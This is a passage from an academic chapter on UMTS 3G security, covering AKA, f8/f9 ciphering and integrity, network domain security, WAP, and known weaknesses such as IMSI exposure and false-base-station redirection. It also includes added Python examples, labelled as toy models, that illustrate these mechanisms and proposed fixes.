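        if not hmac.compare_digest(xmac, mac):
            return "MAC failure", None
        sqn_int = int.from_bytes(sqn, "big")
        if sqn_int <= self.sqn_ms or sqn_int - self.sqn_ms > SQN_WINDOW:
            return "synchronisation failure", None              # USIM triggers resync to the HE
        self.sqn_ms = sqn_int
        return "ok", {"res": f2(self.k, rand), "ck": f3(self.k, rand), "ik": f4(self.k, rand)}


def vlr_run_aka(auc: AuC, usim: USIM) -> str:
    """VLR/SGSN: take the next AV, challenge the USIM with RAND||AUTN,
    compare the returned RES with XRES, then CK/IK go to the RNC."""
    av = auc.generate_av()
    status, keys = usim.authenticate(av["rand"], av["autn"])
    if status != "ok":
        return status
    if not hmac.compare_digest(keys["res"], av["xres"]):
        return "RES mismatch"
    assert keys["ck"] == av["ck"] and keys["ik"] == av["ik"]   # both sides now hold CK, IK
    return "authenticated"


if __name__ == "__main__":
    K = bytes(range(16))                                        # constructed shared secret
    auc, usim = AuC(K), USIM(K)
    print(vlr_run_aka(auc, usim))                               # authenticated
    av = auc.generate_av()
    print(usim.authenticate(av["rand"], av["autn"])[0])         # ok
    print(usim.authenticate(av["rand"], av["autn"])[0])         # replayed AV: synchronisation failure
```

Replaying a captured AV fails on the SQN check even though its MAC is valid, and a modified RAND fails on the MAC check because AK, and therefore the unmasked SQN, no longer match; those two checks are what distinguishes this procedure from the GSM challenge/response.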

Figure 5. Ciphering over the radio access link. At both ends (sender: UE or RNC; receiver: RNC or UE) f8 takes CK together with COUNT-C, BEARER, DIRECTION and LENGTH and produces a keystream block; the sender XORs it with the plaintext block to obtain the ciphertext block, and the receiver XORs the same keystream with the ciphertext block to recover the plaintext block.

Security in UMTS 3G Mobile Networks

The f8 is a symmetric synchronous stream cipher algorithm that is used to encrypt frames of variable length. The main input to f8 is the 128-bit secret cipher key CK. Additional inputs, which ensure that two frames are never encrypted with the same keystream, are a 32-bit value COUNT, a 5-bit value BEARER, and a 1-bit value DIRECTION (see Figure 5). The output is a sequence of bits (the “keystream”) of the same length as the frame. The frame is encrypted by XORing the data with the keystream, and decrypted by XORing the ciphertext with the same keystream. For UMTS R99, f8 is based on the Kasumi algorithm (3GPP TR 33.908, 2000).

Integrity Protection of Signaling Messages

The radio interface in 3G mobile systems has also been designed to support integrity protection on the signaling channels. This enables the receiving entity to verify that the signaling data have not been modified in an unauthorized way since they were sent. Furthermore, it ensures that the origin of the received signaling data is indeed the one claimed. The integrity protection mechanism is not applied to the user plane, for performance reasons.

The function f9 is used to authenticate the integrity and the origin of signaling data between the MS and the RNC in UMTS. It computes a 32-bit MAC (see Figure 6), which is appended to the frame and is checked by the receiver. The main inputs to the algorithm are the 128-bit secret integrity key IK and the variable-length frame content MESSAGE. Additional inputs, which ensure that the MACs of two frames with identical content are different, are a 32-bit value COUNT, a 32-bit value FRESH, and a 1-bit value DIRECTION. In UMTS R99, f9 is also based on the Kasumi algorithm (3GPP TR 33.908, 2000).

Network Domain Security

Network domain security (NDS) features ensure that signaling exchanges within the UMTS core network, as well as in the whole wireline network, are protected. Various protocols and interfaces are used for the control plane signaling inside and between core networks, such as the mobile application part (MAP) and GPRS tunneling protocol (GTP) protocols, and the Iu (IuPS, IuCS) and Iur interfaces (3GPP TS 23.002, 2002). These are protected by standard procedures based on existing cryptographic techniques. Specifically, the IP-based protocols shall be protected at the network level by means of IP security (IPsec) (Kent & Atkinson, 1998), while the protection of the signaling system 7 (SS7)-based protocols and of the Iu and Iur interfaces shall be accomplished at the application layer. In the following, the NDS context for IP-based (3GPP TS 33.210, 2002) and SS7-based (3GPP TS 33.200, 2002) protocols is presented. Moreover, the employment of traditional security technologies originally designed for fixed networking, such as firewalls and static virtual private networks (VPNs), is examined. The application of these technologies safeguards the UMTS core network from external attacks and protects users’ data when they are conveyed over the public Internet.

Figure 6. Derivation of the MAC on a signaling message. The sender (UE or RNC) feeds IK, COUNT-I, FRESH, DIRECTION and MESSAGE into f9 to obtain MAC-I; the receiver (RNC or UE) recomputes XMAC-I from the same inputs and compares it with the received MAC-I.
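As an added example (not from the chapter, and not the KASUMI-based 3GPP algorithms), the following Python models f8 and f9 with exactly the inputs of Figures 5 and 6. The keystream generator and the MAC are HMAC-SHA256 constructions chosen for this example, so only the framing, not the cipher strength, matches UMTS. What it demonstrates is why the framing matters: COUNT-C, BEARER and DIRECTION must never repeat under one CK (keystream_reuse_leak shows the XOR-of-plaintexts leak a repeated COUNT-C produces, independent of CK), and MAC-I verification fails on a modified message, a flipped DIRECTION or a replayed COUNT-I.

```python
# Added example (not the 3GPP f8/f9): toy f8 keystream cipher and f9 integrity function
# with the UMTS input framing (COUNT-C/BEARER/DIRECTION, COUNT-I/FRESH/DIRECTION, 32-bit MAC-I).
import hmac
import hashlib


def f8_keystream(ck: bytes, count_c: int, bearer: int, direction: int, length: int) -> bytes:
    """Keystream of `length` bytes for one frame.  COUNT-C (32 bits), BEARER (5 bits) and
    DIRECTION (1 bit) make the keystream different for every frame under the same CK."""
    if not (0 <= count_c < 2**32 and 0 <= bearer < 2**5 and direction in (0, 1)):
        raise ValueError("f8 input out of range")
    iv = count_c.to_bytes(4, "big") + bytes([(bearer << 1) | direction])
    out = bytearray()
    for block in range((length + 31) // 32):        # counter mode over 32-byte blocks (assumption)
        out += hmac.new(ck, iv + block.to_bytes(4, "big"), hashlib.sha256).digest()
    return bytes(out[:length])


def f8(ck: bytes, count_c: int, bearer: int, direction: int, frame: bytes) -> bytes:
    """Encrypt or decrypt (same operation): XOR the frame with its keystream."""
    ks = f8_keystream(ck, count_c, bearer, direction, len(frame))
    return bytes(a ^ b for a, b in zip(frame, ks))


def f9(ik: bytes, count_i: int, fresh: int, direction: int, message: bytes) -> bytes:
    """32-bit MAC-I over a signaling message.  COUNT-I, FRESH and DIRECTION make the
    MACs of two identical messages differ."""
    if not (0 <= count_i < 2**32 and 0 <= fresh < 2**32 and direction in (0, 1)):
        raise ValueError("f9 input out of range")
    hdr = count_i.to_bytes(4, "big") + fresh.to_bytes(4, "big") + bytes([direction])
    return hmac.new(ik, hdr + message, hashlib.sha256).digest()[:4]


def verify_mac_i(ik: bytes, count_i: int, fresh: int, direction: int,
                 message: bytes, mac_i: bytes) -> bool:
    """Receiver side: recompute XMAC-I and compare it with MAC-I in constant time."""
    return hmac.compare_digest(f9(ik, count_i, fresh, direction, message), mac_i)


def keystream_reuse_leak(ck: bytes, count_c: int, bearer: int, direction: int,
                         m1: bytes, m2: bytes) -> bytes:
    """What an eavesdropper learns if COUNT-C is reused for two frames: the XOR of the two
    ciphertexts equals the XOR of the two plaintexts, and CK plays no role in recovering it."""
    c1 = f8(ck, count_c, bearer, direction, m1)
    c2 = f8(ck, count_c, bearer, direction, m2)
    return bytes(a ^ b for a, b in zip(c1, c2))


if __name__ == "__main__":
    ck, ik = bytes(range(16)), bytes(range(16, 32))     # constructed keys
    frame = b"RLC PDU: user data"                        # constructed frame
    c = f8(ck, 0x00000007, 3, 0, frame)
    assert f8(ck, 0x00000007, 3, 0, c) == frame         # receiver recovers the plaintext
    print("uplink ciphertext:", c.hex())
    msg = b"RRC SECURITY MODE COMPLETE"                  # constructed signaling message
    mac = f9(ik, 5, 0x1234ABCD, 0, msg)
    print("MAC-I:", mac.hex(), "verified:", verify_mac_i(ik, 5, 0x1234ABCD, 0, msg, mac))
    print("same message, tampered:", verify_mac_i(ik, 5, 0x1234ABCD, 0, msg + b"!", mac))
```

The COUNT values are the practitioner's concern here: the 32-bit COUNT-C and COUNT-I wrap, so the keys must be refreshed (a new AKA run) before any counter repeats under the same CK/IK; otherwise the leak shown by keystream_reuse_leak applies to user data and a replayed signaling frame would carry a valid MAC-I.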



IP-based Protocols

The UMTS network domain control plane is sectioned into security domains, which typically coincide with the operator borders. Security gateways (SEGs) are entities at the borders of the IP security domains used for securing native IP-based protocols. It is noted that NDS does not extend to the user plane, which means that packet flows over the Gi interface (3GPP TS 23.002, 2002) will not be protected by the SEGs. The key management functionality is logically separate from the SEG. Key administration centers (KACs) negotiate the IPsec security associations (SAs) by using the Internet key exchange (IKE) protocol (Harkins & Carrel, 1998) in a client mode, on behalf of the network entities (NEs) and the SEGs. The KACs also distribute the SA parameters to the NEs or the SEGs through standard interfaces. Figure 7 depicts the UMTS NDS architecture for IP-based protocols.

To secure the IP traffic between two NEs, either a hop-by-hop or an end-to-end scheme may be applied. The first requires that the originating NE establishes an IPsec tunnel to the appropriate SEG in the same security domain and forwards the data to it. The SEG terminates this tunnel and sends the data through another IPsec tunnel to the receiving network. The second tunnel is terminated by the SEG in the receiving domain, which in turn uses IPsec to pass the data to its final destination (path (a) in Figure 7). The end-to-end scheme implies that an IPsec SA is established directly between the two NEs (path (b) in Figure 7). This scheme can also be applied in case the two parties belong to the same security domain.

Node authentication can be accomplished using either pre-shared symmetric keys or public keys (Harkins & Carrel, 1998). Using pre-shared symmetric keys means that the KACs or the NEs do not have to perform public key operations, and there is no need for establishing a public key infrastructure. IPsec is configured either in transport mode or in tunnel mode (Kent & Atkinson, 1998); whenever at least one end point is a gateway, tunnel mode suits better. Finally, the IPsec protocol shall always be the encapsulating security payload (ESP) (Kent & Atkinson, 1998), given that it can provide both confidentiality and integrity protection.

SS7-based Protocols

NDS for SS7-based protocols is mainly found at the application layer. Specifically, in case the transport relies on SS7 or on a combination of SS7 and IP, then security shall be provided at the application layer. On the other hand, whenever the
Figure 7. NDS architecture for IP-based protocols



Figure 8. NDS architecture for SS7 and mixed SS7/IP-based protocols

transport is based only on IP, then security may be provided either at the network layer exclusively, using IPsec, or by a combination of the application and network layers. For signaling protection at the application layer the necessary SAs will be network-wide, and they are negotiated by the KAC similarly to the IP-based architecture (see Figure 8). End-to-end protected signaling will be indistinguishable from unprotected signaling traffic to all parties except the sending and receiving sides.

It is worth noting that in Rel-4 the only protocol that is to be protected is MAP. The complete set of enhancements and extensions that facilitate MAP security is termed MAPsec (3GPP TS 33.200, 2002). MAPsec covers the security management procedures, as well as the security of the transport protocol, including data integrity, data origin authentication, anti-replay protection, and confidentiality. Finally, for IKE adaptation a specific Domain of Interpretation is required.

Traditional Network Security Features

Besides the security features that are included in the 3G security architecture, the mobile network operators can apply traditional security technologies used in terrestrial networking to safeguard the UMTS core network as well as the inter-network communications. User data in the UMTS backbone network are conveyed in clear-text, exposing them to various external threats. Moreover, inter-network communications are based on the public Internet, which enables IP spoofing by any malicious third party who gets access to it. In order to defeat these vulnerable points, the mobile operators can use two complementary technologies: firewalls and VPNs (Gleeson, Lin, Heinanen, Armitage, & Malis, 2000).

Firewalls can be characterized as a technology providing a set of mechanisms to enforce a security policy on data from and to a corporate network. They are established at the borders of the core network, allowing only traffic originating from specific foreign IP addresses. Thus, firewalls protect the UMTS backbone from unauthorized penetration. Furthermore, application firewalls prevent direct access through the use of proxies for services, which analyze application commands, perform authentication, and keep logs.

Since firewalls do not provide privacy and confidentiality, VPNs have to complement them to protect data in transit. A VPN establishes a secure tunnel between two points, encapsulates and encrypts data, and authenticates and authorizes user access to the corporate resources on the network. Thus, VPNs extend dedicated connections between remote branches, or remote access for mobile users, over a shared infrastructure. Implementing a VPN makes security issues such as confidentiality, integrity, and authentication paramount. There is a



two-fold benefit that arises from VPN deployment: low cost and security.

The border gateway is an element that resides at the border of the UMTS core network and provides the appropriate level of security policy (e.g., a firewall), as well as maintaining static, pre-configured security tunnels (e.g., IPsec tunnels) granting VPN services to specific peers. It serves as a gateway between the PS domain and an external IP network that is used to provide connectivity with other PS domains located in other core networks.

User and Application Domain Security Features

User Domain Security

User domain security (3GPP TS 33.102, 2002) ensures secure access to the MS. It is based on a physical device called the UMTS integrated circuit card (UICC), which can be easily inserted into and removed from terminal equipment, containing security applications such as the USIM (3GPP TS 31.102, 2002). The USIM represents and identifies a user and his/her association to an HE. It is responsible for performing subscriber and network authentication, as well as key agreement, when 3G services are accessed. It may also contain a copy of the user’s profile.

USIM access is restricted to an authorized user or to a number of authorized users. To accomplish this, the user and the USIM must share a secret (e.g., a PIN). The user gets access to the USIM only if he/she proves knowledge of the secret. Furthermore, access to a terminal or to other user equipment can be restricted to an authorized USIM. To this end, the USIM and the terminal must also share a secret. If a USIM fails to prove its knowledge of the secret, then access to the terminal is denied.

Application Domain Security

Application domain security (3GPP TS 33.102, 2002) deals with secure messaging between the MS and the SN or the SP over the network, with a level of security chosen by the network operator or the application provider. A remote application should authenticate a user before allowing him/her to utilize the application services, and it could also provide application-level data confidentiality. Application-level security mechanisms are needed because the lower layers’ functionality may not guarantee end-to-end security; such a lack of end-to-end security can be expected when, for instance, the remote party is accessible through the Internet.

The USIM application toolkit (3GPP TS 33.111, 2001) provides the capability for operators or third-party providers to create applications that are resident on the USIM. To assure secure transactions between the MS and the SN or the service provider (SP), a number of basic security mechanisms, such as entity authentication, message authentication, replay detection, sequence integrity, confidentiality assurance, and proof of receipt, have been specified and integrated in the USIM Application Toolkit.

Figure 9a. WAP 1.2.1 architecture. Protocol stacks: WAP device (WAE, WSP, WTP, WTLS, WDP, wireless bearer), WAP gateway (both stacks), Web server (WAE, HTTP, TLS, TCP, IP, wired). A WTLS security channel runs between the WAP device and the WAP gateway, and a separate TLS security channel between the WAP gateway and the Web server.

Figure 9b. WAP 2.0 architecture. Protocol stacks: WAP device (WAE, HTTP, TLS, TCP*, IP, wireless), WAP gateway (TCP* and TCP over IP), Web server (WAE, HTTP, TLS, TCP, IP, wired). A single TLS security channel runs end to end from the WAP device to the Web server.

Abbreviations: HTTP, HyperText Transfer Protocol; IP, Internet Protocol; TCP, Transmission Control Protocol; TCP*, wireless-profiled TCP; TLS, Transport Layer Security; WAE, Wireless Application Environment; WAP, Wireless Application Protocol; WDP, Wireless Datagram Protocol; WSP, Wireless Session Protocol; WTLS, Wireless Transport Layer Security; WTP, Wireless Transport Protocol.



Wireless Application Protocol (WAP) is a suite of standards for the delivery and presentation of Internet services on wireless terminals, taking into account the limited bandwidth of mobile networks as well as the limited processing capabilities of mobile devices. It separates the network into two domains (i.e., the wireless and the Internet domain) and introduces a WAP gateway that translates between the protocols used in each domain. The WAP architecture has been standardized in two releases (ver. 1.2.1 and ver. 2.0) (Wireless Application Forum, n.d.).

In WAP 1.2.1 (see Figure 9a), security is applied by using the wireless transport layer security (WTLS) protocol (Wireless Application Forum, n.d.) over the wireless domain and the transport layer security (TLS) protocol over the Internet domain. WTLS, which is based on TLS, provides peer authentication, data integrity, data privacy, and protection against denial of service, optimized for use over narrow-band communication channels. However, WAP 1.2.1 does not support end-to-end security, since the conveyed data are protected by two separate security channels (i.e., the WTLS security channel and the TLS security channel) that meet at the gateway.

On the other hand, WAP 2.0 (see Figure 9b) introduces the Internet protocol stack into the WAP environment. It allows a range of different gateways, which enable conversion between the two protocol stacks anywhere from the top to the bottom of the stack. A TCP-level gateway allows for two versions of TCP, one for the wired and another for the wireless network domain. On top of the TCP layer, TLS can establish a secure channel all the way from the MS to the remote server. Thus, the availability of a wireless profile for TLS enables end-to-end security, allowing interoperability for secure transactions.

Security Visibility and Configurability

Although the security measures provided by the SN should be transparent to the end user, visibility of the security operations, as well as of the supported security features, should be provided. This may include: (1) indication of access network encryption; (2) indication of network-wide encryption; and (3) indication of the level of security (e.g., when a user moves from 3G to 2G).

Configurability enables the mobile user and the HE to configure whether a service provision should depend on the activation of certain security features. A service can only be used when all the relevant security features are in operation. The configurability features that are suggested include: (1) enabling/disabling user-USIM authentication for certain services; (2) accepting/rejecting incoming non-ciphered calls; (3) setting up or not setting up non-ciphered calls; and (4) accepting/rejecting the use of certain ciphering algorithms.

Network-Wide User Data Confidentiality

Network-wide confidentiality is an option that provides a protected mode of transmission of user data across the entire network. It protects data against eavesdropping on every link within the network, and not only on the vulnerable radio links. Whenever network-wide confidentiality is applied, access link confidentiality for user data between the MS and the RNC is disabled, to avoid ciphering the same data twice. However, access link confidentiality for signaling information, as well as user identity confidentiality, are retained to facilitate the establishment of the encryption process. Figure 10 depicts the network-wide encryption deployment.

Network-wide confidentiality uses a synchronous stream cipher algorithm similar to that employed in the access link encryption. Initially, a data channel is established between the communicating peers, indicating also the intention for network-wide encryption. VLRa and VLRb exchange cipher keys (Ka and Kb) for users a and b, respectively, using cross-boundary signaling protection, and then pass them to the MSs over protected signaling channels. When each MS has received the other party’s key, the end-to-end session key, Ks, is calculated as a function of Ka and Kb. Alternatively, the VLRs can mutually agree on Ks using an appropriate key agreement protocol. Both key management schemes satisfy the lawful interception requirement, since Ks can be generated by the VLRs.



Figure 10. Network-wide encryption deployment

Security Weaknesses

The analyzed 3G security architecture provides advanced security services and addresses many of the security concerns that have been listed in the context of next generation mobile networks. However, there are some critical points that need further elaboration and improvement. In the following, the identified security weaknesses of the 3G security architecture, which might cause network and service vulnerability, are briefly presented.

As mentioned previously, the mobile user’s identity and location are valuable information that requires protection. A possible weakness in the 3G security architecture is the backup procedure for TMSI reallocation (3GPP TS 24.008, 2002). Specifically, whenever the SN/VLR cannot associate the TMSI with the international mobile subscriber identity (IMSI), because of TMSI corruption or database failure, the VLR should request the user to identify himself by means of the IMSI on the radio path. Furthermore, when the user roams and the new SN/VLRn cannot contact the previous (old) VLRo, or cannot retrieve the user identity from it, the SN/VLRn should also request the user to identify himself by means of the IMSI on the radio path (3GPP TS 33.102, 2002). This may allow an active attacker to pretend to be a new SN to which the user has to reveal his/her permanent identity. In both cases, the IMSI that represents the permanent user identity is conveyed in clear-text on the radio interface, violating user identity confidentiality.

Another critical point is that the users may be identified by means of the IMSI in signaling conversations on the wireline path. For example, the SN/VLR may use the IMSI to request the authentication data for a single user from his/her HE. Thus, user identity confidentiality and user location privacy rely on the security of the wireline signaling connections. NDS features protect signaling exchanges in the wireline network architecture with IP and SS7 technologies, but these features are considered for the later versions of the UMTS standardization process, leaving the first one (R99) unprotected.

The authentication and key agreement procedure of UMTS presents two critical security flaws, presented in Zhang and Fang (2005). The first one allows an adversary to redirect user traffic from one network to another. This can be achieved because the user (i.e., using the sequence numbers, SQN) can only verify whether an authentication vector



was generated by the HE. On the other hand, he/she cannot determine whether an authentication vector was requested by the SN he/she is actually talking to, since the authentication vector could have been requested by any SN. Thus, an adversary owning a false base/mobile station device (i.e., a device that emulates both a base station and a mobile station) can impersonate a genuine base station and entice a legitimate user to camp on the radio channels of the false base station. The adversary can also impersonate a legitimate mobile station and establish a connection with a genuine base station. This allows the adversary to relay messages between a legitimate mobile station and a genuine base station, realizing the redirection attack. This attack represents a real threat since the security levels provided by different networks are not always the same. In addition, it could cause billing problems, as the service rates offered by different networks are not always the same either.

The second security flaw related to UMTS authentication (Zhang & Fang, 2005) allows an adversary to use authentication vectors obtained from one corrupted network to impersonate other networks. When a network is corrupted, an adversary could forge an authentication data request from the corrupted network to obtain authentication vectors for any user, independent of the actual location of the user. Then, the adversary could use the obtained authentication vectors to impersonate uncorrupted networks and to mount false base station attacks against legitimate users. Therefore, the corruption of one network may jeopardize the entire system. For this reason, it is critical that security measures are in place in every network.

The application of firewalls in 3G systems presents some weaknesses, since they were originally conceived to address security issues for fixed networks. Firewalls attempt to protect the clear-text data transmitted in the UMTS backbone from external attacks, but they are inadequate against attacks that originate from malicious subscribers of other mobile networks, as well as from network operator personnel or any other third party that gets access to the UMTS core network. Mobility may imply roaming between networks and operators, possibly changing the source address, which, because of the static configuration of firewalls, may potentially lead to discontinuity of service connectivity for the mobile user. Moreover, the security value of firewalls is limited, because they allow direct connection to ports and cannot distinguish services.

Similarly to firewalls, VPN technology fails to provide the flexibility required by typical mobile users. Currently, VPNs for UMTS subscribers are established in a static manner between the border gateway of a UMTS network and a remote security gateway of a corporate private network. This allows the realization of VPNs only between a security gateway of a large organization and a mobile operator, when a considerable amount of traffic requires protection. Thus, this scheme can provide VPN services neither to individual mobile users that may require on-demand VPN establishment, nor to enterprise users that may roam internationally. In addition, static VPNs have to be reconfigured every time the VPN topology or the VPN parameters change.

On the other hand, if a mobile user uses the WAP architecture (ver. 1.2.1), data privacy is not guaranteed. Although encryption is used, the WAP gateway constitutes a security hole, since inside the gateway data are handled unencrypted. WTLS is only used between the mobile device and the gateway, while TLS can be used between the gateway and the Web server. From a security point of view, the gateway should be considered an entity-in-the-middle. This means that the exchanged data may be available to people with privileged access to the WAP gateway and thus, the privacy of the data depends on the gateway’s internal security policy.

WAP 2.0 does address the “gap” in security caused by protocol translation at the WAP gateway of the previous version (ver. 1.2.1). However, the mobile phone would have to use an IP protocol stack, at the expense of larger latency and bandwidth consumption. Although TLS can be used to secure the communication of any application, it must be integrated into the application and thus, to a large extent, it is used for Web-based applications. Interaction with the end user is needed, for example, to check with whom a secure session has


been established or to explicitly request the client to authenticate with the server. TLS is generally a resource-consuming protocol for deployment in mobile devices with limited processing capabilities and over low-bandwidth/high-latency wireless networks. Moreover, the operational overhead may be increased by complex key-exchange procedures in case the protected service contains cross-references to other services.

Finally, network-wide encryption may also encounter problems when transcoding is used. Voice calls may need to be transcoded when they cross network borders, meaning that voice data may have to undergo a change such as a bit-rate change or some other transformation. It is not possible to apply such a transformation to an encrypted signal, which implies that the signal has to be decrypted before transcoding. Furthermore, network-wide confidentiality lacks flexibility and is not applicable to all types of service in different mobile scenarios. Specifically, it is limited to protecting the communication between mobile subscribers.

Current Research on UMTS Security

The weak points of the UMTS security architecture may lead to compromises of end users and of the network security of the UMTS system. These compromises may influence the system deployment and the users’ willingness to utilize UMTS for the provision of advanced multimedia services, which realize the concept of the mobile Internet. In the following, the current research on UMTS security and the proposed enhancements that aim at improving the UMTS security architecture are briefly presented and analyzed.

Identity Confidentiality

To limit the exposure of the permanent identities (IMSI) of mobile users over the vulnerable radio interface, the additional usage of two complementary temporary identities for each mobile subscriber that is attached to the network has been proposed (Xenakis & Merakos, 2004b). One of these temporary identities resides at the SN (TMSIALT), and the second one at the home network of the mobile user (TMSIHE). When the VLR of the SN fails to page a mobile user using the current TMSI, it can try to page him/her using the alternative temporary identity (TMSIALT), which also resides in the VLR. In case of a VLR database failure, or a corruption of the temporary identities (i.e., TMSI and TMSIALT) that reside in the VLR, the VLR requests the temporary identity TMSIHE from the home network, by which it can page the mobile user. This identity resides in the user’s home network precisely so that it survives a database (VLR) failure. If none of the TMSIs is valid, or all of them are corrupted, the user is not attached to the network.

Both additional temporary identities (i.e., TMSIALT and TMSIHE) derive from the current TMSI. The latter consists of four octets, and its generation procedure is chosen by the mobile operator. However, some general guidelines are applied in all implementations in order to avoid double allocation of TMSIs after a restart of the allocating node (i.e., VLR or SGSN). For this reason, some part of the TMSI may be related to the time when it was allocated, or may contain a bit field that is changed when the allocating node has recovered from the restart. After the generation of a TMSI, the allocating node applies two individual hash functions (i.e., HASHALT and HASHHE), which produce the corresponding TMSIALT and TMSIHE, respectively. Then, the allocating node forwards the three temporary identities to the involved mobile user, and the TMSIHE to its home network. In cases where the home and the serving network are the same, the TMSIHE can be stored in the HLR, which is not affected by the failures that corrupt the other two temporary identities. Finally, each time the current TMSI is renewed, the two additional temporary identities change as well, to prevent an adversary from linking them to the permanent identity of the user.
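The three-identity scheme above, as an added example that is not part of the chapter or of the cited proposal: the allocating node builds a four-octet TMSI from a restart flag, a time field and a sequence counter (one possible realization of the guidelines the text mentions; the exact layout is an assumption), derives TMSIALT and TMSIHE with two keyed hash functions, distributes them, and falls back through the three identities when paging. The hash key is a VLR-local secret introduced here: with unkeyed hashes, anyone who observes the TMSI on the radio path could compute the other two identities and link them, which would defeat the unlinkability the scheme aims at.

```python
# Added example (not from the chapter or from Xenakis & Merakos, 2004b): a runnable model of
# the TMSI / TMSI_ALT / TMSI_HE scheme with the paging fallback it describes.
import hmac
import hashlib
from typing import Dict


def build_tmsi(restart_flag: int, minutes: int, seq: int) -> bytes:
    """Four-octet TMSI (layout is an assumption): bit 31 = restart flag, flipped after a node
    restart; bits 30..16 = allocation time in minutes mod 2^15; bits 15..0 = per-node
    sequence number.  Flag and time field keep pre- and post-restart TMSIs from colliding."""
    value = ((restart_flag & 1) << 31) | ((minutes & 0x7FFF) << 16) | (seq & 0xFFFF)
    return value.to_bytes(4, "big")


def derive_alt(tmsi: bytes, key: bytes) -> bytes:
    """HASH_ALT: keyed, so an observer of the TMSI cannot compute TMSI_ALT from it."""
    return hmac.new(key, b"ALT" + tmsi, hashlib.sha256).digest()[:4]


def derive_he(tmsi: bytes, key: bytes) -> bytes:
    """HASH_HE: same key, different domain tag, so TMSI_HE is unlinkable to TMSI_ALT."""
    return hmac.new(key, b"HE" + tmsi, hashlib.sha256).digest()[:4]


class MobileStation:
    def __init__(self, imsi: str):
        self.imsi = imsi
        self.identities: Dict[str, bytes] = {}    # as received from the allocating node

    def answers_page(self, identity: bytes) -> bool:
        return identity in self.identities.values()


class HomeNetwork:
    """HLR side: stores only TMSI_HE, which a VLR failure cannot touch."""
    def __init__(self):
        self.tmsi_he: Dict[str, bytes] = {}


class VLR:
    def __init__(self, hash_key: bytes, restart_flag: int = 0):
        self.hash_key, self.restart_flag, self.seq = hash_key, restart_flag, 0
        self.table: Dict[str, Dict[str, bytes]] = {}    # imsi -> {"tmsi", "tmsi_alt"}

    def allocate(self, ms: MobileStation, hlr: HomeNetwork, minutes: int) -> None:
        """Generate a TMSI, derive both hashes, hand all three to the MS and TMSI_HE to the HLR."""
        self.seq += 1
        tmsi = build_tmsi(self.restart_flag, minutes, self.seq)
        alt, he = derive_alt(tmsi, self.hash_key), derive_he(tmsi, self.hash_key)
        self.table[ms.imsi] = {"tmsi": tmsi, "tmsi_alt": alt}
        hlr.tmsi_he[ms.imsi] = he
        ms.identities = {"tmsi": tmsi, "tmsi_alt": alt, "tmsi_he": he}

    def restart(self) -> None:
        """Database failure: every VLR-side identity is lost and the restart flag flips."""
        self.table = {}
        self.restart_flag ^= 1

    def page(self, ms: MobileStation, hlr: HomeNetwork) -> str:
        """Try TMSI, then TMSI_ALT, then TMSI_HE fetched from the home network.  Returns the
        name of the identity that reached the user, or NOT_ATTACHED (no IMSI goes on air)."""
        entry = self.table.get(ms.imsi, {})
        for name in ("tmsi", "tmsi_alt"):
            if name in entry and ms.answers_page(entry[name]):
                return name.upper()
        he = hlr.tmsi_he.get(ms.imsi)
        if he is not None and ms.answers_page(he):
            return "TMSI_HE"
        return "NOT_ATTACHED"


def paging_sequence(ms_imsi: str = "001010123456789", minutes: int = 1000) -> list:
    """Drive the model through the three fallback cases; returns the identity used each time."""
    ms, hlr = MobileStation(ms_imsi), HomeNetwork()
    vlr = VLR(hash_key=b"vlr-local-secret")           # constructed key
    vlr.allocate(ms, hlr, minutes)
    used = [vlr.page(ms, hlr)]                         # normal case
    vlr.table[ms.imsi]["tmsi"] = b"\x00\x00\x00\x00"   # primary TMSI corrupted at the VLR
    used.append(vlr.page(ms, hlr))
    vlr.restart()                                      # whole VLR database lost
    used.append(vlr.page(ms, hlr))
    return used


if __name__ == "__main__":
    print(paging_sequence())    # ['TMSI', 'TMSI_ALT', 'TMSI_HE']
```

After a restart the VLR has no table at all, so the only way back to the user without an IMSI request on the radio path is the TMSIHE held by the home network; the model returns NOT_ATTACHED when that identity is missing too, which is the case the text describes as the user not being attached.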



Authentication and Key Agreement

To address the security issues involved with the authentication and key agreement procedure, Zhang and Fang (2005) have proposed an adaptive protocol for mobile authentication and key agreement, called AP-AKA. The proposed protocol can defeat the redirection attack and may drastically lower the impact of network corruption. An overview of AP-AKA is shown in Figure 11.

The AP-AKA protocol retains the framework of the legacy authentication and key agreement, but eliminates the synchronization required between the mobile station and its home network (i.e., SQN_MS and SQN_HE). In AP-AKA, each mobile station and its home network share an authentication key K and three cryptographic algorithms F, G, and H, where F and H are MACs and G is a key generation function. In practice, the authentication key is usually generated by the home network and programmed into the mobile station during service provisioning. Unlike the legacy authentication and key agreement, the home network in AP-AKA does not maintain a dynamic state (for example, the counter) for each individual subscriber. The mobile station can verify whether an AV was indeed requested by a SN and was not used before by that SN. The AP-AKA protocol specifies a sequence of six flows. Each flow defines a message type and format sent or received by an entity. Depending on the execution environment, entities have the flexibility of adaptively selecting flows for execution, and thus AP-AKA is called an adaptive protocol.

User Data Security

Another weakness of the current UMTS security architecture that can be overcome is related to the lack of effective protection of user data in the fixed part of the UMTS network. To address this problem, two alternative security solutions, which are based on existing security technologies, can be used: (1) application layer security, and (2) the dynamic establishment of mobile VPNs that satisfy users’ needs.

Application layer security solutions integrate security into applications at the level of end users. The most prominent protocol that provides security at this layer for Internet technology is the Secure Sockets Layer (SSL) protocol (Gupta & Gupta, 2001). SSL supports server authentication using certificates, data confidentiality, and message integrity. Since SSL is relatively “heavy” for implementation on mobile devices, which are characterized by limited processing capabilities, a lightweight version of SSL named “KiloByte” SSL (KSSL) has been proposed (Gupta & Gupta, 2001). This SSL implementation (KSSL) provides an advantage by enabling mobile devices (UMTS MS) to communicate directly and securely with a considerable number of Internet Web servers that support SSL.

Figure 11. Overview of AP-AKA



An alternative approach to the previous solutions, which employ security at the application layer, pertains to those that employ security at the network layer. The most prominent technique for providing security at the network layer is IPsec (Kent & Atkinson, 1998). As a network layer security mechanism, IPsec protects traffic on a per-connection basis and thus is independent of the applications that run above it. In addition, IPsec is used for the implementation of VPNs (Gleeson et al., 2000). An IPsec-based VPN is used for the authentication and the authorization of user access to corporate resources, the establishment of secure tunnels between the communicating parties, and the encapsulation and protection of the data transmitted over the network. On-demand VPNs that are tailored to specific security needs are especially useful for UMTS users, who require any-to-any connectivity in an ad hoc fashion. Regarding the deployment of VPNs over the UMTS infrastructure, three alternative security schemes have been proposed: (1) the end-to-end (Xenakis & Merakos, 2004a), (2) the network-wide (Xenakis & Merakos, 2006), and (3) the border-based (Xenakis, Loukas, & Merakos, 2006). These schemes mainly differ in the position where the security functionality is placed within the UMTS network architecture (MS, RNC, and GGSN), and in whether data in transit are ever in cleartext or available to be tapped by outsiders.

